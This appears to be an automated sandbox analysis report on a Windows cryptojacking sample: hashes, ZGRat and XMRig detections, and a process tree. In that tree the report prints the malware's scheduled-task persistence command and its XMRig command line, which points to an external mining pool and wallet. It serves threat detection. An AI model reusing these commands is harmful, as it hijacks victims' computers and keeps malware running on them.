Overview
overview
10Static
static
102LRS3ODTLG...JL.exe
windows10-1703-x64
102LRS3ODTLG...JL.exe
windows11-21h2-x64
106G2SZLVHVH...3B.exe
windows10-1703-x64
106G2SZLVHVH...3B.exe
windows11-21h2-x64
106TS3GUANXW9E1KF8.exe
windows10-1703-x64
106TS3GUANXW9E1KF8.exe
windows11-21h2-x64
10G9NB5XSAH0XAAPCN.exe
windows10-1703-x64
6G9NB5XSAH0XAAPCN.exe
windows11-21h2-x64
6PV0HLG9QQ3...NU.exe
windows10-1703-x64
10PV0HLG9QQ3...NU.exe
windows11-21h2-x64
10Protect544cd51a.dll
windows10-1703-x64
1Protect544cd51a.dll
windows11-21h2-x64
1PsExec.exe
windows10-1703-x64
1PsExec.exe
windows11-21h2-x64
1W7W5WFGX1D...7O.exe
windows10-1703-x64
3W7W5WFGX1D...7O.exe
windows11-21h2-x64
6skz3rpen.kc1.exe
windows10-1703-x64
1skz3rpen.kc1.exe
windows11-21h2-x64
1Analysis
-
max time kernel
1041s -
max time network
1197s -
platform
windows10-1703_x64 -
resource
win10-20231220-en -
resource tags
arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system -
submitted
26-01-2024 19:03
Behavioral task
behavioral1
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win11-20231222-en
Behavioral task
behavioral3
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
6TS3GUANXW9E1KF8.exe
Resource
win10-20231220-en
Behavioral task
behavioral6
Sample
6TS3GUANXW9E1KF8.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win11-20231222-en
Behavioral task
behavioral9
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win10-20231220-en
Behavioral task
behavioral10
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
Protect544cd51a.dll
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
Protect544cd51a.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
PsExec.exe
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
PsExec.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win10-20231215-en
Behavioral task
behavioral16
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win11-20231222-en
Behavioral task
behavioral17
Sample
skz3rpen.kc1.exe
Resource
win10-20231215-en
Behavioral task
behavioral18
Sample
skz3rpen.kc1.exe
Resource
win11-20231215-en
General
-
Target
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
-
Size
5.6MB
-
MD5
1a27bd843a09f923661a15300e02d703
-
SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
-
SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
-
SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
SSDEEP
49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T
Malware Config
Signatures
-
Detect ZGRat V1 5 IoCs
Processes:
resource yara_rule behavioral9/memory/3320-0-0x00000000000E0000-0x0000000000680000-memory.dmp family_zgrat_v1 behavioral9/files/0x000700000001abd8-13.dat family_zgrat_v1 behavioral9/files/0x000700000001abd8-12.dat family_zgrat_v1 behavioral9/files/0x000700000001abd8-44.dat family_zgrat_v1 behavioral9/files/0x000700000001abd8-139.dat family_zgrat_v1 -
XMRig Miner payload 43 IoCs
Processes:
resource yara_rule behavioral9/memory/2616-21-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-22-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2616-41-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-54-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-55-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-56-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-57-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-59-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-62-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-64-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-65-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-66-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/4344-67-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-84-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-85-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-87-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-86-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-88-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-92-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/2624-93-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-107-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-108-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-109-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-110-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-111-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-115-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1108-116-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1952-130-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1952-131-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1952-133-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/1952-138-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral9/memory/972-159-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 5 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral9/memory/3320-0-0x00000000000E0000-0x0000000000680000-memory.dmp net_reactor behavioral9/files/0x000700000001abd8-13.dat net_reactor behavioral9/files/0x000700000001abd8-12.dat net_reactor behavioral9/files/0x000700000001abd8-44.dat net_reactor behavioral9/files/0x000700000001abd8-139.dat net_reactor -
Executes dropped EXE 6 IoCs
Processes:
.exe.exe.exe.exe.exe.exepid Process 3000 .exe 4396 .exe 3412 .exe 1004 .exe 384 .exe 432 .exe -
Processes:
resource yara_rule behavioral9/memory/2616-19-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-21-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2616-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-54-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-55-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-56-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-57-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-59-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-62-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-64-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-65-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-66-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/4344-67-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-81-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-84-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-85-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-87-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-86-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-88-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-92-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/2624-93-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-104-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-107-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-108-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-109-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-110-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-111-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-115-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1108-116-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1952-127-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1952-130-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1952-131-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1952-133-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/1952-138-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/972-148-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral9/memory/972-159-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
.exe.exe.exe.exe.exedescription pid Process procid_target PID 3000 set thread context of 2616 3000 .exe 82 PID 4396 set thread context of 4344 4396 .exe 88 PID 3412 set thread context of 2624 3412 .exe 94 PID 1004 set thread context of 1108 1004 .exe 100 PID 384 set thread context of 1952 384 .exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 3408 schtasks.exe 3124 schtasks.exe 3876 schtasks.exe 920 schtasks.exe 1668 schtasks.exe 3308 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 3108 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
.exe.exe.exe.exe.exe.exepid Process 3000 .exe 4396 .exe 3412 .exe 1004 .exe 384 .exe 432 .exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exedescription pid Process Token: SeDebugPrivilege 3320 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe Token: SeDebugPrivilege 3000 .exe Token: SeLockMemoryPrivilege 2616 vbc.exe Token: SeLockMemoryPrivilege 2616 vbc.exe Token: SeDebugPrivilege 4396 .exe Token: SeLockMemoryPrivilege 4344 vbc.exe Token: SeLockMemoryPrivilege 4344 vbc.exe Token: SeDebugPrivilege 3412 .exe Token: SeLockMemoryPrivilege 2624 vbc.exe Token: SeLockMemoryPrivilege 2624 vbc.exe Token: SeDebugPrivilege 1004 .exe Token: SeLockMemoryPrivilege 1108 vbc.exe Token: SeLockMemoryPrivilege 1108 vbc.exe Token: SeDebugPrivilege 384 .exe Token: SeLockMemoryPrivilege 1952 vbc.exe Token: SeLockMemoryPrivilege 1952 vbc.exe Token: SeDebugPrivilege 432 .exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
vbc.exevbc.exevbc.exevbc.exevbc.exepid Process 2616 vbc.exe 4344 vbc.exe 2624 vbc.exe 1108 vbc.exe 1952 vbc.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
PV0HLG9QQ3YXXG1AJAMYRYE08NU.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.exedescription pid Process procid_target PID 3320 wrote to memory of 3376 3320 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe 75 PID 3320 wrote to memory of 3376 3320 PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe 75 PID 3376 wrote to memory of 3108 3376 cmd.exe 76 PID 3376 wrote to memory of 3108 3376 cmd.exe 76 PID 3376 wrote to memory of 3000 3376 cmd.exe 77 PID 3376 wrote to memory of 3000 3376 cmd.exe 77 PID 3000 wrote to memory of 3824 3000 .exe 79 PID 3000 wrote to memory of 3824 3000 .exe 79 PID 3824 wrote to memory of 3876 3824 cmd.exe 80 PID 3824 wrote to memory of 3876 3824 cmd.exe 80 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 3000 wrote to memory of 2616 3000 .exe 82 PID 4396 wrote to memory of 3576 4396 .exe 84 PID 4396 wrote to memory of 3576 4396 .exe 84 PID 3576 wrote to memory of 920 3576 cmd.exe 87 PID 3576 wrote to memory of 920 3576 cmd.exe 87 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 4396 wrote to memory of 4344 4396 .exe 88 PID 3412 wrote to memory of 4972 3412 .exe 90 PID 3412 wrote to memory of 4972 3412 .exe 90 PID 4972 wrote to memory of 1668 4972 cmd.exe 93 PID 4972 wrote to memory of 1668 4972 cmd.exe 93 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 3412 wrote to memory of 2624 3412 .exe 94 PID 1004 wrote to memory of 3260 1004 .exe 96 PID 1004 wrote to memory of 3260 1004 .exe 96 PID 3260 wrote to memory of 3308 3260 cmd.exe 99 PID 3260 wrote to memory of 3308 3260 cmd.exe 99 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 1004 wrote to memory of 1108 1004 .exe 100 PID 384 wrote to memory of 3200 384 .exe 102 PID 384 wrote to memory of 3200 384 .exe 102 PID 3200 wrote to memory of 3408 3200 cmd.exe 105 PID 3200 wrote to memory of 3408 3200 cmd.exe 105 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 384 wrote to memory of 1952 384 .exe 106 PID 432 wrote to memory of 4928 432 .exe 108 PID 432 wrote to memory of 4928 432 .exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp73F7.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3108
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:3876
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2616
-
-
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:920
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4344
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:1668
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2624
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3308
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1108
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1952
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵PID:4928
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵PID:972
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.4MB
MD575bf5aac671eefb7d9ee44cab3a7d54b
SHA1dde5f1534d45030c543d685be0b1c5e80e0e34a6
SHA256205c92c57ffa0b74f5a21a9b554d82516470f2f5de37879de1e19ddae8f9a173
SHA51200cf83ac7e10f515752dc7928cab5b9738f53645eeba35776fa4f86dca16d8c9211ad57a2124d47a9f0b9e38cdf32a8d25bba458d894cf936f71e10cf9eb7f5c
-
Filesize
3.2MB
MD514dce81decb3bc5a6ef9653a3cb4e7b2
SHA1d96b109599b5c47ce95003e68ca7431c43a17dc2
SHA2569dd65f52d98ff918a686a0db486ebe41d3542dbd73e1ec266c73d6760c2aca79
SHA5121b215dadfb3f2fa1ab7ec97aec0b3e4db4000da8f8e3abef21c584346bf49b5bac98313d66accb3e6759c0b719b90909b073ef86d4d40665bbfc05460fbddfe7
-
Filesize
265KB
MD532c1266fb0679f1cf1fcdf468afb7537
SHA147cf213a5b83967a12cd4157c3ae9b3e935ad2c0
SHA256f722ef6fc83ea8ff40f6a277589d4d169ab6a308b8df0a25147f61ef2280f99f
SHA512ba18cab973b85644ce3cd3ed322f68fd2d2a69171e8bafcd4913ab155b835d85f0df1f1ac92b71161c5ab708c163c48450759a6801beabb56dc74f0087345a44
-
Filesize
5.6MB
MD51a27bd843a09f923661a15300e02d703
SHA15cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA2568ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
Filesize
1KB
MD599e47c178875de9fe1675fe5ba0e1f42
SHA1c28934210fbe9d2ee90e751b8cf21be297b3d171
SHA256773f7a03c7b56de09b71249ce4920458ef67fda14b923df1d5ebc1725101b9ff
